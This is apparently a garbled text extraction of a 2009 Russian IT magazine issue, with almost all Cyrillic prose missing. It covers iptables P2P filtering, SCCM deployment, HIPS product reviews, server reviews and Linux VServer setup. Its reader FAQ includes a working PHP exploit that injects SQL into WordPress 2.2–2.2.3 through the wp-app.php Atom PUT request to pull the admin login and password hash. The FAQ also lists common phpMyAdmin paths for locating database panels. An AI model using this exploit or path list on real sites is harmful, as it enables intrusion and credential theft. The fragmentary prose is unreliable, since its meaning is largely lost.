IPTABLES_SRC = $(wildcard /usr/src/iptables)
#CFLAGS = -O3 -Wall
. , ,
l7-filter, IPP2P make oldconfig && make prepare ( IPP2P
). libipt_ipp2p.
so iptables:
$ sudo cp libipt_ipp2p.so /usr/lib/iptables
:
:
$ sudo make menuconfig
Networking Networking option Network packet

filtering framework(Netfilter) Core Netfilter Configuration,
Connection tracking flow accounting Layer 7 match
support. string, , Netfilter
(FTP, H323 .) .
; /etc/l7protocols:
$ sudo cp libipt_ipp2p.so /lib/iptables

$ sudo cp ipt_ipp2p.ko /lib/modules/ùname -r`/kernel/
net/ipv4/netfilter
$ sudo modprobe ipt_ipp2p
$ sudo bash -c "echo ipt_ipp2p >> /etc/modules"
! :
$ sudo iptables -m ipp2p --help
$ tar xzvf l7-protocols-2009-05-28.tar.gz

$ cd l7-protocols-2009-05-28/
$ sudo make install
. iptables
-m layer7 --help . , BitTorrent, AIM Skype, :
iptables -A FORWARD -m layer7 l7proto bittorrent -j
DROP
120
, :
iptables -A FORWARD -m ipp2p --edk --kazaa --gnu --bit \
--apple --dc --soul --winmx --ares -j DROP
, . USB/CD/DVD, , . z
X 08 /128/ 09
>> SYN/ACK
GRINDER
/GRINDER@SYNACK.RU /

SCCM:
IT-
>> SYN/ACK
,
, , IT- .

GPO - Radmin.
, .
Microsoft System Center Configuration
Manager, IT-
.
SCCM SCCM 2007 R2 (www.microsoft.com/
systemcenter/configurationmanager)
Systems
Management Server (SMS).
IT-.
System Center , Configuration Manager .
, SCCM
, , , Microsoft, (Desired Configuration,

: , ,
),
.
SC (www.microsoft.com/systemcenter)
, .
:
Data Protection Manager

Windows;
Operations Manager ;
Essentials , X 08 /128/ 09

,
;
Virtual Machine Manager
;
Capacity Planner ,
,
,
;
Service Desk
, ;
Mobile Device Manager (MDM)
Windows Mobile;
Reporting Manager
.
,
,
. (Site system)
,
SCCM. SCCM
single-site multi-site.
SCCM.

(Primary site, ) (Secondary site,
Primary site). Primary
(Central
site). , , -
(). SCCM :
(Management point);
(BITS-enabled
distribution point);
(Reporting
point);
(Software Update Point);
(Server
locator point);

(Fallback status point, Win2k8).
C ,
. Branch
distribution point.
(3-5
) .
SQL-.
Client Agent,
. Native
( )
Mixed ( SMS). Native (
HTTPS). , ( IP, ).
, ( ) .
121
>> SYN/ACK
SCCM
SCCM R2,
WinXP/2003/VistaSP1/2k8, SCCM SP2, Win7/2k8R2/2k8SP2.
: WinXP, Vista
Win7 , Branch
distribution point.
. R2 :
SP1 Full. ,
VHD- SCCM.
, , SCCM SP1
R2. SCCM, , , , .
, SCCM: single-site
multi-site, , , . ,
- .
:
Configuration Manager
2007 Configuration
Manager 2007, TechNet.
PIII 733 , 256
, 5 10 . , ,
, , , .
, .
SQL Server 2005 SP2 (go.microsoft.com/fwlink/?LinkId=69795), . Express Edition . , : IIS 6.0, MMC
3.0, NET Framework 2.0, ASP.NET, BITS (Background Intelligent Transfer
Service) WebDAV.
( ), Win2k3 . , Primary Secondary
RODC ( ). Primary
, ,
, ,
, . Secondary
.
SCCM Win2k8 singlesite Primary site. ,
, AD, SQL- .
, BITS. , IIS
7.0, , .
,
, . . IIS
ASP.NET ASP ( ), Windows
122
, IIS 6 WMI IIS 6.

. , .
WebDAV Win2k8! , x86 x64 (go.microsoft.com/
fwlink/?LinkID=141805, go.microsoft.com/fwlink/?LinkID=141807)
.
WebDAV . IIS ( ), Default Web Site WebDAV Authoring
Rules. Enable WebDAV, WebDAV. . Add Authoring Rule.
. All Content, All users
Permissions Read. WebDAV,
WebDAV Settings:
Allow anonymous Property Queries (
) True;
Allow Custom Properties (
) False;
Allow property queries with infinite depth ( ) True;
Allow hidden files to be listed (
) True.
IIS.
IIS ,
.
, . applicationHost.config, %windir%\
System32\inetsrv\config, <fileExtensions> <requestFiltering>
allowed="true". :
<add fileExtension=".java" allowed="true" />
, .
SCCM SCCM SP1 (ConfigMgr07SP1Eval_RTM_RUS_6221.exe). .

AD. .
, SCCM, SMSETUP
BIN, , ( x64), extadsch.exe. ConfigMgr_ad_shema.ldf
,
C:\ExtADSch.log.
ConfigMgr_ad_shema.ldf.
, ldifde -i -f ConfigMgr_ad_shema.ldf.
splash.hta ( ) .
Run the prerequisite checker ,
X 08 /128/ 09
>> SYN/ACK
PREREQUISITE
CHECKER , SCCM
SCCM. : (Primary, Secondary CM Console); Primary
, SQL-, WSUS
Management Point (,
). WSUS , SDK Server
. , SDK WSUS,
,
, . SDK-
WSUS, .
; , , . Success ( ),
SCCM.
SCCM Install Configuration

Manager 2007 .
, ,
, .
,
SCCM
, SMS 2003 SCCM.
, Install a
Configuration Manager site server.
Installation
Setting, Simple Custom. SCCM,
Simple. , . Custom :
Site type . Primary Secondary.
, Primary.
Customer Experience Improvement Program
Configuration CEIP, .
SCCM ( , ).
( ),
.
X 08 /128/ 09
SCCM IIS, BITS

Site Settings ( , , 000 ) .
Site Mode Native Mixed. Native
,
PKI.
Client Agent Selection
, , , NAP (Network Access
Protection, ) .. .
Database server SQL-
.
SMS Provider Setting
SMS, , . , .
Management Point , . , ;
Port Setting TCP- .
80 443 ( Native mode).
Updated Prerequisite components Microsoft .
, , ( ).
(> 5 )
Prerequisite Checker Begin Install
SCCM. ,
. SP1 R2 .
SCCM - ,
,
, .
CM, ,
, . SCCM
INFO
info

WSUS 3.0
SP1 Win2k8

,
z 2009
.

Run the prerequisite
checker. .
HTTP://WWW
links

SCCM 2007 www.
microsoft.com
/systemcenter/
configuration
manager.

TechNet, SCCM technet.
microsoft.com/ru-ru/
configmgr.
123
>> SYN/ACK
SCCM
DVD
dvd

, ,
SCCM 2007 Win2k8
.
124
, . ,
(site boundary), , ,
(Discovery) (approval).
. SCCM , , site
boundary.
Database
Site management Site settings.

Boundaries. , , , New Boundary (Description), ,
(
), (Type).
; :
IP-subnet (), Active Directory site, IPv6 prefix IPaddress range. , , . Network Connection,
, :
Fast (LAN) Slow. , Boundaries,
.
Discovery methods, 6 ,

. 4 Active Directory ,
, Security;
Heartbeat ( ) Network ( ). Network discovery ,
AD. ,
. , , Enable ... ( Heartbeat
Discovery).
, AD, ( , LDAP
..), , . -
,
.
, Polling Schedule
. , Run discovery as soon as possible.
Active Directory attribute , .
Network discovery , . ,
Type of discovery : , + + . Subnets,
Domains, SNMP, SNMP Devices DHCP
. ,
Subnets ,
, Schedule
.
. .
. . Wake On
LAN
, /. Ports
. Advanced
, , hardware ID.

Automatically create new client records .... , Manually resolve conflicting records. Advanced
SCCM AD . Security

SCCM. , , Site Mode (, ) (Native
Mixed). ,
Approval settings:
Manually approve each computer ,
,
, ;
Automatically approve computers in trusted
domains (recommended) Discovery ;
Automatically approve all computers (not
recommended)
X 08 /128/ 09
>> SYN/ACK
SCCM
. , , AD, .
, .
This site containts only ConfigMgr 2007
clients SCCM- (
SMS ).
, .. (collection) (, ..)
, .
Computer management Collections. (, ). All Systems
, SCCM. ,
Update Collection Membership .
. , Client , , Approved/Assigned/Blocked/Active
. . : ( \\server\site\Client\ccmsetup.exe);
Push-; AD Logon,
.
. Client Push Install () SCCM.
Site settings Client installation method.
Client Push Install .
X 08 /128/ 09
Client Push Installations . , Enable Client Push Installations for assigned

resources System type ,
Ser vers, Workstations
Domain controllers. Enable Client Push
Installations to the site systems,
SCCM. Accounts
, .
.
Install client .
: , ( ,
..) Next. .
SCCM
, .

, .
,
,
. z
125
>> SYN/ACK
GRINDER
/ GRINDER@SYNACK.RU /
>> SYN/ACK
, . ,
, .
HIPS.
HIPS (Host Intrusion
Prevention System, )
.
,
(
, ),
, / /, ,

.
API-
,
, , .

,
, .
, HIPS .
.

,
, , . ,
, Prevx ( )
, -
126
(
) , .

.
(
, API-) HIPS
. .
: ,
- HIPS,
, ?
,
,
HIPS ,

.
, HIPS.
. .
DEFENSEWALL
: SoftSphere Technologies
Web: www.softsphere.com/rus
: Intel Pentium x86
300 , 256 / (x86/x64) 1 , 512
( WinXP Vista )
: Windows NT/2000/XP/2003/Vista
DefenseWall /
.
(Sandbox), .

-, P2P, IM-
.. , , .
( CD/DVD
). :
,
, .
, ,
. , .
.

(,
..), .

( ).
, , X 08 /128/ 09
>> SYN/ACK
,
.
. ,
, .
. DefenseWall , .
.
: , , ,
. .
, , .
.
/ (GoBanking/Shopping)
, .
.
Expert Mode,
,
.
, ,
(Apache, IIS etc)
, ,
(CodeRed, Slammer, Sasser, Blaster), . ,
, ,
.
SAFE'N'SEC
: S.N.Safe&Software
Web: www.safensoft.ru
: Intel Pentium x86 300 , 256
WinXP / (x86/x64) 1 , 512 Vista
: Windows XP/Vista
HIPS Safe'n'Sec,
S.N.Safe&Software,
V.I.P.O. (Valid Inside Permitted Operations). .
Safe'n'Sec .
, ( SHA-256).
, , ,
, , .
, ,
.
,
. , , . X 08 /128/ 09
.
Safe'n'Sec , .
. Safe'n'Sec 2009. Safe'n'Sec
Enterprise . :
Safe'n'Sec Admin Explorer ;
;
Service Center ,
; , .
, , Dr.Web -.
, .
, ,
, , USB-.
, Safe'n'Sec ,
. , Kaspersky AntiVirus 2009 .
MCAFEE HOST INTRUSION PREVENTION

FOR DESKTOPS AND SERVERS
: Network Associates
Web: www.mcafee.com, www.mcafeesecurity.ru
:
: Windows XP/Vista
: Windows 2000/2003/2008 (x86/x64), RHE Linux 4.0
(x86), Solaris 8/9/10
HIPS McAfee Desktop
Firewall HIPS Entercept ( 2003
, Network Associates).

Total Protection for Endpoint. , : ,
.
, ,
, .
( ) USB-.
.
, , ,
VPN. ,
127
>> SYN/ACK
SAFE'N'SEC ADMIN EXPLORER

SAFE'N'SEC

INFO
info

HIPS

.

McAfee
:
,
.
Prevx

.
,

, HIPS

.
128
.
(), . IPS
, ,
CISCO SECURITY
AGENT (CSA)
Cisco, 2003
Okena, HIPS
StormWatch Agent,
. CSA
, Windows 2k Vista, RHEL 3.0/4.0, Solaris 8/9
VMware.
. ,
, ,
,
( ,
COM-), , . ,

.
.
. ,

(, , CD/DVD), ..
Cisco Management Center for Cisco Security Agents.
, CSA Cisco IPS, ,
(NAC),
Cisco MARS. ,
.
McAfee .
,
. HIPS , () ( ).
Server, ,
- (Apache 1.3./2., Sun ONE/Java
Web Server) (SQL Server 2000)
(Directory traversal, DoS, SQL
injection .).
HIPS
,
, ePolicy Orchestrator
(
McAfee). , HIPS
ePO.
ePO: 3.6.1 MMC, 4.0.0 -.
HTTP/
HTTPS .
ePO-
Win2k SP4/2003 SP1/SP2/R2,
Win2k/XP/2003/Vista. SQL- SQL Server 2005
Express Edition; SQL Server 2000/2005.
PREVX 3.0
: Prevx Limited
Web: prevx.com
:
: Windows 98/NT/2000/XP/2003/Vista/2008/
Se7en
Prevx 2004 Community IPS,
. Cloud computing
, (software-as-service, SAAS)
Prevx .
Prevx ,
. , .
X 08 /128/ 09
>> SYN/ACK
EPO:
MCAFEE

.
(Prevx Cloud Community Database).
IPS , .
, 768
.
, . . ,
2-4 . , .
, ,
,
.
.
,
. 4 10 , .
250 .
: ( ), (
) . . Prevx , ,
Windows;
.
Home, , Business Enterprise
, . Free Malware Monitor,
, , ,
. ,
.
Prevx ,
: ,
, .
.
,
.
X 08 /128/ 09
PREVX
PREVX : ,

-

, , . HIPS .
. z

?
, , HIPS
,
,
, . HIPS
.

.
DVD
dvd

Safe'n'Sec,
DefenseWall Prevx.
129
>> SYN/ACK
NATHAN BINKERT

/ NAT@SYNACK.RU /
PRIMERGY RX200 S5:

1U- Fujitsu

Fujitsu PRIMERGY RX200 S5
> :
D 2786 ( Intel 5500)
> :
1 2 Intel Xeon 55xx
> :
1 96 DIMM DDR3 1066/1333 (12
)
ECC, SDCC, Memory Scrubbing,
> :
8 2,5- SAS
>> SYN/ACK
> RAID:
RAID- 0/1

RX200 S5 Fujitsu,
HP IBM,
.
/ Intel Xeon 55xx,
SAS, 96 DDR3.
RAID 0/1 PCI-X RAID
0,1,10,5,50,6,60. .
-
130
> :
2 Ethernet 1 /
1 iRMC S2 (10/100
/)
> :

,

( 1 + 1)
> :
1 PCI-Express x4 ()
2 PCI-Express x8 (1
, 1 )
> :
ServerView Local Service
Panel (LSP)

(iRMC S2, 32
),
IPMI 2.0
> :
Cool-safe
6
(5+1)
> :
(1U, 431x765x43 )
> -:
7 USB 2.0 (3 , 3
, 1 )
2 VGA (1 )
1 RS-232-C (9-)
> :
3

.
Blue-Ray
Cool-safe.
, Cool-safe,
Computational
Fluid Dynamics, ,

,
.
. ,
89%, -

Green IT.
IPMI 2.0
. .
Microsoft Windows
Server 2003/2008, Novell SUSE Linux Enterprise
Server, Red Hat Enterprise Linux, VMware
Infrastructure.
Linux .
: 60000 .
X 08 /128/ 09
>> SYN/ACK
NATHAN BINKERT
/ NAT@SYNACK.RU /

:
R-Style Marshall NP 2010
> :
16 DDR2-533 DDR2-667
ECC (8 )
> :
IDE-
6 SATA
4 SAS

> RAID:
RAID 0, 1, 10, 5
> :
2 Intel Gigabit Ethernet
> :
550
650

R-Style Marshall NP 2010
>> SYN/ACK
> :
2/4- Intel
Xeon Processor 50xx, 51xx 53xx
667 , 1067 1333
> :
2 PCI Express x4
2 PCI-X 64-bit/133
1 PCI 32-bit/33
> :
Intel 5000V
> -:
7 USB 2.0 (4 , 2 , 1 ,
USB FDD)
2 RS-232-C
Marshall NP 2010

R-Style Computers.
,
( ).
,
, .
Intel Xeon 5000,
DDR2-667 ECC,
16 , 3.5"

SAS/SATA-.

,
web- ( ).
550
650
.

DVDRW - USB-.
X 08 /128/ 09
2 DB-9 (9 pin, )
2 PS/2
> :
: 80
:
120
SAS/SATA HDD:
92
> :
ATI ES1000 (16 SDRAM)
CD, DVD/CDRW DVDRW
> :
(452x235x483)
(6U, 235447483)
> :
3
.
(, ,
, -
).

3
100 , .
: Microsoft Windows Server
2003/2008.
: 35000 .
131
>> SYN/ACK

/ ZOBNIN@GMAIL.COM /

Linux VServer
>> SYN/ACK
, ?
, root? ?
Linux VServer
.

()
FreeBSD Jail.
,

(, /dev /
proc, ),
IP-.
,
, Xen, VMWare KVM,

,
.

,
.
,
,
:

( 2-3%)
.

- ,

. ,
, ,
,

,
,
, ,
.
- .
132
VSERVER? UNIX-

. FreeBSD
Jail, Solaris
(Zones), Linux OpenVZ Linux
VServer.
OpenVZ (openvz.org)
, ,
.
Linux VServer (linux-vserver.org),
,
. OpenVZ

VPS ( ) , VServer
FreeBSD
Jail. Linux VServer
( 7 ) ,
Linux;

,
.
Linux VServer
: Linux-

. VServer
,

Ubuntu 9.04,
,
kernel.org .
, Ubuntu 9.04,
2.6.28, , .
1. apt keyring
VServer:
$ sudo apt-key adv --recv-keys
--keyserver keyserver.ubuntu.com
BB9BFB5B
2.
VServer /etc/apt/sources.list:
deb http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main
deb-src http://ppa.launchpad.net/
christoph-lukas/ppa/ubuntu jaunty
main
3. :
$ sudo apt-get update
$ sudo apt-get install linux-imagevserver linux-headers-vserver utilvserver
,
.
1. :
# cd /usr/src
# wget http://www.kernel.org/
pub/linux/kernel/v2.6/linux-2.6.28.7.tar.bz2
# wget http://vserver.13thfloor.
at/Experimental/patch-2.6.28.7vs2.3.0.36.8.diff
2. ,
:
# tar -xjf linux-2.6.28.7.tar.bz2
X 08 /128/ 09
>> SYN/ACK
eth0 82.195.23.28
IPTables
iptables -t nat -A POSTROUTING \
-s 192.168.1.1/24 -d ! 192.168.1.1/24 \
-J SNAT --to-source 82.195.23.28
Linux VPS
eth0: alias 192.168.1.1
Linux
Host System
#
#
#
#
cd linux-2.6.28.7
cp /boot/config-X.X.X .
patch -p1 < ../patch-2.6.28.7-vs2.3.0.36.8.diff
make menuconfig
3. Linux VServer:
Enable Legacy Kernel API API .
Enable Virtualized Guest Time . ,

,
Enable Proc Security , , /proc .
Enable Hard CPU Limits

.
Tag NFSD User Auth and Files
NFS-
Maximum number of Contexts
4. :
# make
# make modules_install
# cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.28.7-vs2.3
5. :
# VI /BOOT/GRUB/MENU.LST
title Linux 2.6.28.7-vs2.3
root (hd0,0)
kernel /boot/vmlinuz-2.6.28.7-vs2.3 root=/dev/hda1 ro
initrd /boot/initrd.img-2.6.28.7-vs2.3
boot
6. :
# cd /tmp
# wget http://ftp.linux-vserver.org/pub/utils/utilvserver/util-vserver-0.30.215.tar.bz2
# tar xjf util-vserver-0.30.215.tar.bz2
# cd util-vserver-0.30.215
# ./configure --prefix=/usr --sysconfdir=/etc
# make install
X 08 /128/ 09

( Linux VServer),
. ,
,
, tag.

, , ,
.
/etc/fstab, , , /var/lib (
/var/lib/vservers),
tag. :
/dev/sda3 /var ext3 tag 1 1
reiserfs,
attrs. .
Chroot Barrier,
,
:
# setattr --barrier /var/lib/vservers

kernel.vshelper , :
# echo "kernel.vshelper = /usr/lib/util-vserver/vshelper"
>> /etc/sysctl.conf
# sysctl -p

Linux-,
. ,
()
. ftp://ftp.
pld-linux.org/people/hawk/vserver-templates/,
CentOS, Debian, Fedora Ubuntu,
VServer.
Ubuntu ( ,
):
$ cd /tmp
$ wget ftp://ftp.pld-linux.org/people/hawk/vservertemplates/Ubuntu/jaunty-i386.tar.bz2
133
>> SYN/ACK
VSERVER-STAT
PS

INFO
info

/
var/lib/vserver.

, /
etc/vserver/.defaults/
vdirbase
.

vserver
,
(vserver
delete),
(vserver exec),
(vserver
rpm, vserver apt-get).
# vserver vps1 build \

--context 10 \
--hostname vps1.host.ru \
--interface eth0:192.168.1.1/24 \
--initstyle plain \
-m template -- \
-d jaunty \
-t /tmp/jaunty-i386.tar.bz2
/var/lib/
vservers/vps1 .
, vps1, ( ),
vps1.
host.ru,
eth0 IP- 192.168.1.1,
(plain /sbin/init). ,
/tmp/
jaunty-i386.tar.bz2, Ubuntu 9.04
(Jaunty Jackalope).
VServer
, (
),
, man- vserverbuild.

:
# vserver vps1 start
# vserver-stat
LINUX VSERVER
- IP-
.
(0
, 1 ..)

, 1
:
// eth1
-
# echo "eth1" > dev
// IP-
# echo "192.168.1.2" > ip
# echo "24" > prefix
, ifconfig,
,
. VServer
,
.

. , /etc/fstab,
/etc/vservers/vps1/fstab.
,
/dev, /proc /tmp, , , - (
Gentoo):
/usr/portage /usr/portage none bind,rw 0 0
WARNING
.
:
# vserver vps1 stop
warning

top ps
,

.
,
vps vtop.
134

, ,
.., /
etc/vservers/_. /
etc/servers/vps1 .
interfaces,
0.
,
. Linux VServer,
FreeBSD Jail,
IP- ,
,
.
:
1. IP- ( ).
2. NAT -
,
-
.
. SNAT,

:
X 08 /128/ 09
>> SYN/ACK
# chxid -URx -c vps1 /var/lib/vservers/vps1
,
vdlimit,
:
# vdlimit --xid vps1 /var/lib/vservers/vps1
, /etc/
vservers/vps1/dlimits/root vdlimit '--remove',
:
/DEV
,

# iptables -t nat -A POSTROUTING -s 192.168.1.1/24 \
-d ! 192.168.1.1/24 -j SNAT --to-source < IP>
DNAT,
IP- (
web-, VServer):
# iptables -t nat -A PREROUTING -s ! 192.168.1.1/24 \
-m tcp -p tcp --dport 80 \
-j DNAT --to-destination 192.168.1.1:80
, , dlimits rlimits.
,
-. , /etc/vservers/vps1/dlimits, , :
# cd /etc/vservers/vps1
# mkdir dlimits

( ):
# mkdir dlimits/root
# cd dlimits/root
, :
# echo "/var/lib/vservers/vps1" > directory
( ):
# echo "10000" > inodes_total
, ( 10 ):
# echo "10485760" > space_total
root :
# echo "5" > reserved
,
vps1 (, , ):
X 08 /128/ 09
# vdlimit --xid vps1 --remove /var/lib/vservers/vps1
/etc/vservers/_/
rlimits. Linux VServer setrlimit(2)
. 22
(15 + 7,
Linux VServer), ( = 4 x86):
cpu , ,
fsize
rss
nproc
as
nice ,
nsock
openfd
,
/etc/
vservers/_/rlimits. , 100 (25600*4 ):
# mkdir /etc/vservers/vps1/rlimits
# echo "25600" > /etc/vservers/vps1/rlimits/as
, Linux VServer ,
, ,
. , , /
etc/vservers/_/ccapabilities.
:
SET_UTSNAME
setdomainname(2) sethostname(2)
SET_RLIMIT setrlimit(2)
RAW_ICMP ""
SYSLOG syslog(2)
SECURE_MOUNT mount(2)
SECURE_REMOUNT
BINARY_MOUNT /
QUOTA_CTL
ADMIN_MAPPER "device mapper"
ADMIN_CLOOP loop-
KTHREAD
,
flags, nflags, bcapabilities ncaps.
linux-vserver.org/util-vserver:Capabilities_
and_Flags.z
135
>> units

/ LOZOVSKY@GAMELAND.RU /
PSYCHO:

, , PSYCHO-, ,
,
- , , , .

,

,
, -. ,

,

-, ,

.
, -

,
.

, ,
,
, -.
, homo sapiens.
.

,
,

. -
,

?

?
136
?
,

, , ?

.

.
(- 8-10
) . ,

.

.
?

.

,

/ ,

. , , ,
.
, ,
,
.

,
IT-.
,
,

.
.

,
(
) .
. -
, - , -
.
,

.

. ,
, , ,
. ,

-, ,
-, , ,
. ,
,
,
, , , . ?
, ,
. , .
.
?
, ,
,
?
,

, ,
.
,
, .
, .
,
- .
, ,
,
.
-
. . ?
! -
,
,
,
. ,

25 , , ,
, , , .
, ,
,
, , , ,
. , ,
-
-
-, ,
.
, , X 08 /128/ 09
>> units
.

. ,

,
,
,
.

( !) .
,

. , ,
,
,

.
,
( , , ?),

. ,
:
,
. .
,
,

.
,
, .
X 08 /128/ 09
, ,
,
.
,
,
,

.

, ,

! ,
! ,
, ,
30-45 .
,

?
. ,

.
,
, . -
(
), -
. .
, .
(-, , ,
), ,

,
.
, . .

( , )

.
,

,
.
,
(---)

.
,
,
,
. ,

,

,
.
. .
.
.
, , .

.

,

(,

). ?
.
, ,
,
,
.. ,
,
.
: -
, -
, - ,
.
.
, ,
137
>> units

,

, .
,
, ,
, ,

. ! , , ,

!
,
,
, , .
,

-, ,
,
.
z: ,
?
..: -
.
, -
138
.
,
, ?

, -
.
,

, ,
. , ,
.

,
?
-
, ,

.
z: ,
. :

,
,
?
..: . , .
.
z: ?
..: .
-,
.
.
,

.
z: ,

?
,
?
..:

,
( ,
).
, ,
,
. ?

,
,
(, ,
,

).

. ,
, ,
, .
.

, , , ,
( )
.

.
, ,
. .
.
z: -

?

?
..:

. .
,

.

, ,
.

.
,

.
, ,

.
, : X 08 /128/ 09
>> units

.
.
.
(
), , .
, ,
.
z: , , -
.

.
..: . ,
, ,
, .
,
, ,

. , .
-,
.
z: -
,
?
..:
.

, . ,
.
, .
, ,
- . , , .
, ,
.
z: . -

. ,
?
.
..:
:
1. ,
,
.
2. , ,
.
3. .

. , ,
, ,
. ! ,
,
, , ,
.

, .
,
,

.
,
.
4. , .
. ,
, ,

. ,

.
,
.
,
,
.
, -

.
,
,
,

,
,
.
,

,
,
, .
, ,
.
,
,
,
.
,
. ,
, ,

, ,
:
,
,
.
,
, ,
,

,
.
,

( -
).
,
,
,
.
, ,

,
,
java
programming for dummies.
,

. ,

, ,

/

. ! z
5. !
.
. .
, ,
.
X 08 /128/ 09
139
>> units
/ ICQ 884888, HTTP://WAP-CHAT.RU /
FAQ UNITED:
Q: Google PR, .

Alexa rank?
A: ! Alexa.com
XML- ,
, , rank,
(, ,
..).

rank:
<?php
function alexarank($url,
$ip = '127.0.0.1')
{
$url = preg_replace(
'/https?:\/\//i', '', $url);
$uid = sprintf(
'2007%02d%02d%02d%02d%02d',
rand(1,12), rand(1,28),
rand(1,24), rand(1,60),
rand(1,60));
$alexa_url = 'http://xml.alexa.
com/data?cli=10&dat=nsa&ver=quirksearchstatus&uid=' .$uid .
'&userip=' . $ip . '&url=' .
urlencode($url);
$content = file_get_
contents($alexa_url);
if (preg_match(/<POPULARITY
140
URL="[^"]+" TEXT="(\d+)"\/>/i',
$content, $matches))
{
return trim($matches[1]);
}
return 'Unknown';
}
print alexarank('google.com');
?>

XML-
Alexa.
Q: PHP- Alexa rank?
?
, :
<?php
$netcraft = file_get_
contents('http://searchdns.
netcraft.com/?position=limited&hos
t=google.com');
preg_match('|<a href="http://
uptime\.netcraft\.com/up/
graph/\?host=[a-z0-9\._-]+">(.+?)</
a>|i',$netcraft,$os_arr);
print $os_arr[1];
?>
, Nmap (, , - 10 ,
. Step).
A: ,

alexa.com ( ,
),
- Google PR/Alexa rank; , http://
extra-traffic.com/pra_checker.htm.ru.htm.
,
15 .
Q: PHP , ?
A: -
netcraft.com,
Q:
- /.
, ?
A:
http://whitepages.
anywho.com,
:).
, :
1. Last Name (Required)
, , Jackson (RIP! . );
2. State
, , CA;
X 08 /128/ 09
>> units
3. Find A Person;
4. , , :
3. <Enter>
:)
(site:site.com
phpmyadmin), robots.txt .
Q: 100%-
A L Jackson
Some address
Some city, CA some zip code
(408) some phone number
Q: ,
A: ,
mysql?
d_x Forum
Detector. :
A: ! ,
Q: ,
?
A: whoer.net -
. (
whoer.net/ext),
:
1. IP Address ( , IP,
, ip ,
whois).
2. Location (, , , ,
, /,
).
3. Time (, , , UTC, GMT, ).
4. HTTP Headers ( ,
).
5. Scripts ( ActiveX, VBScript,
JavaScript, Java).
6. , (,
).
7. Navigator ( ).
8. Plugins (, ).
, -

. , /
/VPN.
Q: -
?
A: DeeIP, WHB, -

. :
1. ,
,
;
2.
javascript-:
JavScript: this.disabled=true;
document.regMe.submit();
X 08 /128/ 09
(

IPB, phpBB, vBulletin, MyBB)

(, )
PR
, socks5, , socks5
2 :
1.
mysql -h[host] -u[user] -p[pass]
[base] < dump.sql
2.
mysqldump -h[host] -u[user] -p[pass]
[base] > dump.sql

. ,

:
mysqldump -h[host] -u[user] -p[pass]
[base]|tar zcfv base.tar.gz

: http://forum.
antichat.ru/thread114708.html.
mysql?
Q:
A:
phpMyAdmin?
PHP-
Sypex Dumper (sypex.net/products/dumper), , ,
- ,

,
,
.
:
;
;
;
;
;
;
.
Q: -
PhpMyAdmin !
A: -
,
phpmyadmin:
/phpMyAdmin-x.x.x/ ( x.x.x
)
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmi/
, phpmyadmin
Q:
WordPress. - .
A: :).
sql- ,
Alex Concha
141
>> units
buayacorp.com.
, ./wp-includes/atomlib.php
:
function xml_escape($string)
{
return str_replace(
array('&','"',"",'<','>'),
array('&','"',''','<','>'),
$string );
}
, ,
,
PUT atom-,
\ ( WordPress, ,
GET, POST,
COOKIE, SERVER ).
,
, 2.2
2.7.1,
,
.

2.2 2.2.3 edit_posts (

,
):
<?php
$site='lamer.com';
$path='/wp223/wp-app.php?action=/
post/1'; //
$user='editor'; //
$passwd='editor'; //
$auth=base64_
encode($user.":".$passwd);
$fp = fsockopen($site, 80, $errno,
$errstr, 30);
$data=<feed>
<entry>
<id>http://lamer.com/
wp223/2009/03/01/hello-world/</id>
<title type="html">test\</
title>
<summary type="html">,post_
name=(select concat(user_
login,0x3a,user_pass) from wp_users
where ID=1) where id=1/*</summary>
</entry>
</feed>';
$out = "PUT $path HTTP/1.1\r\n";
$out .= "Host: $site\r\n";
$out .= "Content-Type: application/
atom+xml\r\n";
$out .= "Connection: Close\r\n";
$out .= "User-Agent: Opera\r\n";
$out .= "Authorization: Basic
$auth\r\n";
$out .= "Content-Length:
".strlen($data)."\r\n\r\n";
142
fwrite($fp, $out.$data);
fclose($fp);
?>

http://lamer.
com/?p=[ID ]. @test, post_excerpt =,
- :
http://lamer/wp222/2009/03/01/admin:21232f29
7a57a5a743894a0e4a801fc3/ (-,
).
Q: , ,
.mp4. ,
,
.
90 .
(, ,
)?
A: :).
- .

( lossless).
VirtualDub
(www.virtualdub.org). :
1. File Open
video File;
2. Video Filters, ( Add) Rotate.
3. : left
by 90 right by 90.
.
. Video
Full processing mode.
Video
compression.
4. File Save as
AVI.
5. ,
AVI-.

Picasa (picasa.google.com/intl/ru),
.
Q: VMWare
Fedora 10 (iso )

.
chaosreader
(chaosreader.sourceforge.net),
Perl. -
tcpdump snoff,
HTML- telnet-,
, FTP,
http- (HTML-,
GIF JPEG) .. ..
pcapsipdump (sourceforge.net/projects/
psipdump) ,

SIP-, .
SIP-
.
Smbsniff (http://www.hsc.fr/ressources/outils/
smbsniff/index.html.en) , SMB/
CIFS. , ,
.

,
, Tcpreplay (tcpreplay.synfin.
net), .
tcprewrite , .
tcpreplay
: tcpreplay --intf1=eth0
sample.pcap.
Q: 2-hop SSH. -
SSH Proxy?
A: , serv1,
serv1.mydomain.com.
serv2 192.168.1.100,
, serv1,
.
locuser,
remuser.
SSH-, ~/.ssh/
config :
Host *
ForwardAgent yes
Host serv1
HostName alpha.pupkin.net
User locuser
. , Up <Alt+F2>.
?
A: , . -
/etc/vmware/
config:
xkeymap.nokeycodeMap = true
Q: tcpdump (tcpdump,
Wireshark, Kismet ) ?
A: ,
Wireshark
(www.wireshark.org), .
Host serv2
HostName 192.168.1.100
User remuser
ProxyCommand ssh serv1 nc %h %p
?
serv1 serv2
. SSH , ssh alpha.
ssh beta
serv2, alpha.
netcat
(netcat.sourceforge.net). z
X 08 /128/ 09
SSH-
PuTTY
PuTTY Connection Manager
MobaSSH
freeSSHd
WinSCP
Tera Term
WiSSH
>Net
BluetoothView 1.30
Gmail Manager 0.5.7.2
HTTrack Website Copier 3.43
Psi for Windows 0.13
uTorrent 1.8.3
>Misc
7stacks 1.2
AutoHotkey 1.0.48.03
Ditto 3.16.7
f.lux
High Sign Alpha Preview 2
MyTourbook 9.07
Nexus 9.7b2
Stickies 6.7a
>Development
HelpNDoc 2.1
IronRuby 0.9
JProfiler 5.2
Microsoft Expression Blend 3 +
SketchFlow
Microsoft Silverlight 3 SDK
Microsoft Silverlight 3 Tools for
Visual Studio 2008 SP1
MySQL Workbench 5.2 Alpha
Silverlight 3 Toolkit July 2009
Translate.Net 0.1.3493
WinHex 15.4
>>WINDOWS
>Dailysoft
